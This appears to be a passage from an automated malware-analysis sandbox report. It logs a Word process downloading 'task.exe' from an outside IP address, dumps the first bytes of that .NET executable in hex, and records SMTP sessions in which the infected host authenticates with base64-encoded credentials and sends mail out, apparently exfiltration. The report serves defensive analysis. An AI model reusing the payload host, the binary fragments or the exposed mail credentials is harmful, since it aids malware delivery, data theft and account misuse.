00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @\|O H.text `.rsrc@@.reloc@BHet\ { {!{"{#($} }!}"}#0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o,(+{#{#o,++0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+
Nov 25, 2021 18:21:19.907155037 CET	3	IN	Data Raw: 00 1b 6f 31 00 00 0a a2 28 32 00 00 0a 2a 62 02 28 9b 00 00 06 6f 9c 00 00 06 7e 05 00 00 04 28 33 00 00 0a 00 00 2a 3e 02 03 7e 05 00 00 04 28 33 00 00 0a 00 00 2a 3e 02 03 7e 05 00 00 04 28 34 00 00 0a 00 00 2a 2e 02 03 04 28 33 00 00 0a 00 00 Data Ascii: o1(2b(o~(3>~(3>~(4.(3.(40N(5tP%%%%%%(6o7Q+*0?(5tP%%%%(6
Nov 25, 2021 18:21:19.907169104 CET	4	IN	Data Raw: 2a 00 13 30 01 00 0c 00 00 00 11 00 00 11 00 02 7b 07 00 00 04 0a 2b 00 06 2a 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 07 00 00 04 03 fe 01 16 fe 01 0a 06 2c 09 00 02 03 7d 07 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 0f 00 00 11 00 02 7b 08 Data Ascii: 0{+0{,}0{+0{(:,}0{+0{(:,}0{+0{
Nov 25, 2021 18:21:19.907201052 CET	5	IN	Data Raw: 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 19 00 00 04 03 28 3a 00 00 0a 0a 06 2c 09 00 02 03 7d 19 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 12 00 00 11 00 02 7b 1a 00 00 04 0a 2b 00 06 2a 13 30 03 00 3c 00 00 00 13 00 00 11 00 02 7b 1a 00 00 Data Ascii: 0{(:,}0{+0<{(;(;(<(<_,}0{+0<{(;(;(<(<_,}*0
Nov 25, 2021 18:21:20.053627968 CET	7	IN	Data Raw: 00 00 0a 12 02 28 3b 00 00 0a fe 01 12 01 28 3c 00 00 0a 12 02 28 3c 00 00 0a fe 01 5f 16 fe 01 0a 06 2c 09 00 02 03 7d 2b 00 00 04 00 2a 13 30 01 00 0c 00 00 00 12 00 00 11 00 02 7b 2c 00 00 04 0a 2b 00 06 2a 13 30 03 00 3c 00 00 00 13 00 00 11 Data Ascii: (;(<(<_,}+0{,+0<{,(;(;(<(<_,},0{-+0{-(:,}-0{.+0
Nov 25, 2021 18:21:20.053677082 CET	8	IN	Data Raw: 21 00 00 06 d0 0e 00 00 02 28 42 00 00 0a 72 59 01 00 70 28 49 00 00 0a 0c d0 4a 00 00 0a d0 0b 00 00 1b 28 4b 00 00 0a 74 58 00 00 01 1a 8d 56 00 00 01 25 16 08 d0 88 00 00 06 28 4c 00 00 0a 74 50 00 00 01 28 4d 00 00 0a a2 25 17 08 d0 8e 00 00 Data Ascii: !(BrYp(IJ(KtXV%(LtP(M%(LtP(M%(LtP(M%(LtP(MZ%N(KtP%O(KtP%P(KtP%Q(KtP
Nov 25, 2021 18:21:20.053702116 CET	10	IN	Data Raw: 00 00 0a a2 25 17 d0 41 01 00 06 28 4c 00 00 0a 74 50 00 00 01 08 d0 5e 00 00 06 28 4c 00 00 0a 74 50 00 00 01 28 4d 00 00 0a d0 51 00 00 01 28 42 00 00 0a 28 5d 00 00 0a 28 5c 00 00 0a a2 25 18 d0 3d 01 00 06 28 4c 00 00 0a 74 50 00 00 01 08 d0 Data Ascii: %A(LtP^(LtP(MQ(B(](\%=(LtPb(LtP(M(\%9(LtPZ(LtP(M(\%?(LtPd(LtP(M(\(^1%(+(+(++*0H
Nov 25, 2021 18:21:20.053728104 CET	11	IN	Data Raw: 22 00 00 11 00 14 0a 02 7b 3b 00 00 04 03 6f 38 01 00 06 6f 15 00 00 06 d0 06 00 00 02 28 42 00 00 0a 72 59 01 00 70 28 49 00 00 0a 0c d0 20 00 00 02 28 42 00 00 0a 28 5b 00 00 0a 17 8d 62 00 00 01 25 16 d0 32 01 00 06 28 4c 00 00 0a 74 50 00 00 Data Ascii: "{;o8o(BrYp(I (B([b%2(LtP.(LtP(M(\(^1%(+(+(++*0"{;o8o(BrYp(I (B([b%2(LtP
Nov 25, 2021 18:21:20.053899050 CET	12	IN	Data Raw: 28 65 00 00 0a 13 07 02 7b 3e 00 00 04 06 07 11 05 11 07 08 09 6f be 00 00 06 00 02 28 66 00 00 0a 00 2a 26 00 02 28 66 00 00 0a 00 2a 00 13 30 02 00 2a 00 00 00 2d 00 00 11 00 02 7b 4d 00 00 04 0b 07 2c 03 00 2b 1b 02 17 7d 4d 00 00 04 72 5f 01 Data Ascii: (e{>o(f&(f0-{M,+}Mr_ps>(g0.YE"3DUfw*88Atshoi8+t6}?8t7
Nov 25, 2021 18:21:20.053935051 CET	14	IN	Data Raw: 2a 00 00 00 13 30 01 00 0c 00 00 00 32 00 00 11 00 02 7b 5c 00 00 04 0a 2b 00 06 2a 13 30 02 00 ae 00 00 00 33 00 00 11 00 02 03 7d 5c 00 00 04 02 7b 61 00 00 04 02 7b 5c 00 00 04 6f 38 01 00 06 6f 31 00 00 0a 6f 73 00 00 0a 00 02 7b 62 00 00 04 Data Ascii: 02{\+03}\{a{\o8o1os{b{\o:os{c{\o<os{d{\o>os{g{\o@(tos{i{\oBo1osn(}[(c(
Nov 25, 2021 18:21:20.053961992 CET	15	IN	Data Raw: 00 01 7d 71 00 00 04 38 81 00 00 00 02 04 74 36 00 00 01 7d 72 00 00 04 02 7b 72 00 00 04 02 fe 06 e7 00 00 06 73 6a 00 00 0a 6f 6b 00 00 0a 00 2b 5b 02 04 74 36 00 00 01 7d 73 00 00 04 2b 4d 02 04 74 36 00 00 01 7d 74 00 00 04 2b 3f 02 04 74 36 Data Ascii: }q8t6}r{rsjok+[t6}s+Mt6}t+?t6}u+1t7}v+#t7}w+t7}x+}y(}z(c(({{{zoom{{ouov*00/{zo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	173.232.204.89	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:21:28.364023924 CET	533	OUT	GET /task.exe HTTP/1.1 Host: 173.232.204.89 Connection: Keep-Alive
Nov 25, 2021 18:21:28.511565924 CET	534	IN	HTTP/1.1 200 OK Server: nginx/1.19.9 Date: Thu, 25 Nov 2021 17:21:28 GMT Content-Type: application/octet-stream Content-Length: 504832 Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT Connection: keep-alive ETag: "619f6afa-7b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @\|O H.text `.rsrc@@.reloc@BHet\ { {!{"{#($} }!}"}#0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o,(+{#{#o,++0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+
Nov 25, 2021 18:21:28.511601925 CET	535	IN	Data Raw: 00 1b 6f 31 00 00 0a a2 28 32 00 00 0a 2a 62 02 28 9b 00 00 06 6f 9c 00 00 06 7e 05 00 00 04 28 33 00 00 0a 00 00 2a 3e 02 03 7e 05 00 00 04 28 33 00 00 0a 00 00 2a 3e 02 03 7e 05 00 00 04 28 34 00 00 0a 00 00 2a 2e 02 03 04 28 33 00 00 0a 00 00 Data Ascii: o1(2b(o~(3>~(3>~(4.(3.(40N(5tP%%%%%%(6o7Q+*0?(5tP%%%%(6
Nov 25, 2021 18:21:28.511624098 CET	537	IN	Data Raw: 2a 00 13 30 01 00 0c 00 00 00 11 00 00 11 00 02 7b 07 00 00 04 0a 2b 00 06 2a 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 07 00 00 04 03 fe 01 16 fe 01 0a 06 2c 09 00 02 03 7d 07 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 0f 00 00 11 00 02 7b 08 Data Ascii: 0{+0{,}0{+0{(:,}0{+0{(:,}0{+0{
Nov 25, 2021 18:21:28.511775970 CET	538	IN	Data Raw: 13 30 02 00 1b 00 00 00 10 00 00 11 00 02 7b 19 00 00 04 03 28 3a 00 00 0a 0a 06 2c 09 00 02 03 7d 19 00 00 04 00 2a 00 13 30 01 00 0c 00 00 00 12 00 00 11 00 02 7b 1a 00 00 04 0a 2b 00 06 2a 13 30 03 00 3c 00 00 00 13 00 00 11 00 02 7b 1a 00 00 Data Ascii: 0{(:,}0{+0<{(;(;(<(<_,}0{+0<{(;(;(<(<_,}*0
Nov 25, 2021 18:21:28.658314943 CET	540	IN	Data Raw: 00 00 0a 12 02 28 3b 00 00 0a fe 01 12 01 28 3c 00 00 0a 12 02 28 3c 00 00 0a fe 01 5f 16 fe 01 0a 06 2c 09 00 02 03 7d 2b 00 00 04 00 2a 13 30 01 00 0c 00 00 00 12 00 00 11 00 02 7b 2c 00 00 04 0a 2b 00 06 2a 13 30 03 00 3c 00 00 00 13 00 00 11 Data Ascii: (;(<(<_,}+0{,+0<{,(;(;(<(<_,},0{-+0{-(:,}-0{.+0
Nov 25, 2021 18:21:28.658373117 CET	541	IN	Data Raw: 21 00 00 06 d0 0e 00 00 02 28 42 00 00 0a 72 59 01 00 70 28 49 00 00 0a 0c d0 4a 00 00 0a d0 0b 00 00 1b 28 4b 00 00 0a 74 58 00 00 01 1a 8d 56 00 00 01 25 16 08 d0 88 00 00 06 28 4c 00 00 0a 74 50 00 00 01 28 4d 00 00 0a a2 25 17 08 d0 8e 00 00 Data Ascii: !(BrYp(IJ(KtXV%(LtP(M%(LtP(M%(LtP(M%(LtP(MZ%N(KtP%O(KtP%P(KtP%Q(KtP
Nov 25, 2021 18:21:28.658389091 CET	542	IN	Data Raw: 00 00 0a a2 25 17 d0 41 01 00 06 28 4c 00 00 0a 74 50 00 00 01 08 d0 5e 00 00 06 28 4c 00 00 0a 74 50 00 00 01 28 4d 00 00 0a d0 51 00 00 01 28 42 00 00 0a 28 5d 00 00 0a 28 5c 00 00 0a a2 25 18 d0 3d 01 00 06 28 4c 00 00 0a 74 50 00 00 01 08 d0 Data Ascii: %A(LtP^(LtP(MQ(B(](\%=(LtPb(LtP(M(\%9(LtPZ(LtP(M(\%?(LtPd(LtP(M(\(^1%(+(+(++*0H
Nov 25, 2021 18:21:28.658405066 CET	544	IN	Data Raw: 22 00 00 11 00 14 0a 02 7b 3b 00 00 04 03 6f 38 01 00 06 6f 15 00 00 06 d0 06 00 00 02 28 42 00 00 0a 72 59 01 00 70 28 49 00 00 0a 0c d0 20 00 00 02 28 42 00 00 0a 28 5b 00 00 0a 17 8d 62 00 00 01 25 16 d0 32 01 00 06 28 4c 00 00 0a 74 50 00 00 Data Ascii: "{;o8o(BrYp(I (B([b%2(LtP.(LtP(M(\(^1%(+(+(++*0"{;o8o(BrYp(I (B([b%2(LtP
Nov 25, 2021 18:21:28.658766031 CET	545	IN	Data Raw: 28 65 00 00 0a 13 07 02 7b 3e 00 00 04 06 07 11 05 11 07 08 09 6f be 00 00 06 00 02 28 66 00 00 0a 00 2a 26 00 02 28 66 00 00 0a 00 2a 00 13 30 02 00 2a 00 00 00 2d 00 00 11 00 02 7b 4d 00 00 04 0b 07 2c 03 00 2b 1b 02 17 7d 4d 00 00 04 72 5f 01 Data Ascii: (e{>o(f&(f0-{M,+}Mr_ps>(g0.YE"3DUfw*88Atshoi8+t6}?8t7
Nov 25, 2021 18:21:28.658807039 CET	546	IN	Data Raw: 2a 00 00 00 13 30 01 00 0c 00 00 00 32 00 00 11 00 02 7b 5c 00 00 04 0a 2b 00 06 2a 13 30 02 00 ae 00 00 00 33 00 00 11 00 02 03 7d 5c 00 00 04 02 7b 61 00 00 04 02 7b 5c 00 00 04 6f 38 01 00 06 6f 31 00 00 0a 6f 73 00 00 0a 00 02 7b 62 00 00 04 Data Ascii: 02{\+03}\{a{\o8o1os{b{\o:os{c{\o<os{d{\o>os{g{\o@(tos{i{\oBo1osn(}[(c(
Nov 25, 2021 18:21:28.658853054 CET	548	IN	Data Raw: 00 01 7d 71 00 00 04 38 81 00 00 00 02 04 74 36 00 00 01 7d 72 00 00 04 02 7b 72 00 00 04 02 fe 06 e7 00 00 06 73 6a 00 00 0a 6f 6b 00 00 0a 00 2b 5b 02 04 74 36 00 00 01 7d 73 00 00 04 2b 4d 02 04 74 36 00 00 01 7d 74 00 00 04 2b 3f 02 04 74 36 Data Ascii: }q8t6}r{rsjok+[t6}s+Mt6}t+?t6}u+1t7}v+#t7}w+t7}x+}y(}z(c(({{{zoom{{ouov*00/{zo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 25, 2021 18:21:56.953448057 CET	587	49173	208.91.199.224	192.168.2.22	421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
Nov 25, 2021 18:21:59.507791996 CET	587	49174	208.91.198.143	192.168.2.22	421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
Nov 25, 2021 18:22:16.768467903 CET	587	49169	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:16.769277096 CET	49169	587	192.168.2.22	208.91.198.143	EHLO 841618
Nov 25, 2021 18:22:16.919429064 CET	587	49169	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:22:16.929383993 CET	49169	587	192.168.2.22	208.91.198.143	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:17.080898046 CET	587	49169	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:17.239337921 CET	587	49169	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:22:17.241938114 CET	49169	587	192.168.2.22	208.91.198.143	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:17.394002914 CET	587	49169	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:22:17.396831989 CET	49169	587	192.168.2.22	208.91.198.143	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:17.563546896 CET	587	49169	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:22:17.565687895 CET	49169	587	192.168.2.22	208.91.198.143	DATA
Nov 25, 2021 18:22:17.716183901 CET	587	49169	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:18.775433064 CET	587	49169	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as 75FD078216F
Nov 25, 2021 18:22:26.675386906 CET	587	49170	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:26.678370953 CET	49170	587	192.168.2.22	208.91.198.143	EHLO 841618
Nov 25, 2021 18:22:26.830585957 CET	587	49170	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:22:26.830857038 CET	49170	587	192.168.2.22	208.91.198.143	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:26.983576059 CET	587	49170	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:27.138392925 CET	587	49170	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:22:27.141244888 CET	49170	587	192.168.2.22	208.91.198.143	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:27.294445038 CET	587	49170	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:22:27.324578047 CET	49170	587	192.168.2.22	208.91.198.143	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:27.495106936 CET	587	49170	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:22:27.495655060 CET	49170	587	192.168.2.22	208.91.198.143	DATA
Nov 25, 2021 18:22:27.647941113 CET	587	49170	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:28.720513105 CET	587	49170	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as 64796782210
Nov 25, 2021 18:22:38.691118956 CET	49170	587	192.168.2.22	208.91.198.143	QUIT
Nov 25, 2021 18:22:38.843374014 CET	587	49170	208.91.198.143	192.168.2.22	221 2.0.0 Bye
Nov 25, 2021 18:22:39.279792070 CET	587	49171	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:39.280284882 CET	49171	587	192.168.2.22	208.91.198.143	EHLO 841618
Nov 25, 2021 18:22:39.432149887 CET	587	49171	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:22:39.432733059 CET	49171	587	192.168.2.22	208.91.198.143	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:39.585161924 CET	587	49171	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:39.739599943 CET	587	49171	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:22:39.740127087 CET	49171	587	192.168.2.22	208.91.198.143	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:39.892735004 CET	587	49171	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:22:39.893397093 CET	49171	587	192.168.2.22	208.91.198.143	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:40.063146114 CET	587	49171	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:22:40.063385963 CET	49171	587	192.168.2.22	208.91.198.143	DATA
Nov 25, 2021 18:22:40.215734005 CET	587	49171	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:41.810641050 CET	587	49171	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as EF3B278223D
Nov 25, 2021 18:23:07.356256962 CET	587	49172	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:23:07.391012907 CET	49172	587	192.168.2.22	208.91.198.143	EHLO 841618
Nov 25, 2021 18:23:07.543054104 CET	587	49172	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:23:07.543271065 CET	49172	587	192.168.2.22	208.91.198.143	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:23:07.695821047 CET	587	49172	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:23:07.850228071 CET	587	49172	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:23:07.850539923 CET	49172	587	192.168.2.22	208.91.198.143	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:23:07.996356010 CET	587	49172	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:23:07.996689081 CET	49172	587	192.168.2.22	208.91.198.143	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:23:08.149750948 CET	587	49172	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:23:08.149959087 CET	49172	587	192.168.2.22	208.91.198.143	DATA
Nov 25, 2021 18:23:08.295223951 CET	587	49172	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:23:09.657242060 CET	49172	587	192.168.2.22	208.91.198.143	.
Nov 25, 2021 18:23:09.974106073 CET	587	49172	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as 142B2782310
Nov 25, 2021 18:23:15.925235987 CET	49172	587	192.168.2.22	208.91.198.143	QUIT
Nov 25, 2021 18:23:16.070209980 CET	587	49172	208.91.198.143	192.168.2.22	221 2.0.0 Bye
Nov 25, 2021 18:23:16.070552111 CET	49171	587	192.168.2.22	208.91.198.143	QUIT
Nov 25, 2021 18:23:16.216047049 CET	587	49171	208.91.198.143	192.168.2.22	221 2.0.0 Bye
Nov 25, 2021 18:23:16.747162104 CET	587	49173	208.91.199.224	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:23:16.747487068 CET	49173	587	192.168.2.22	208.91.199.224	EHLO 841618
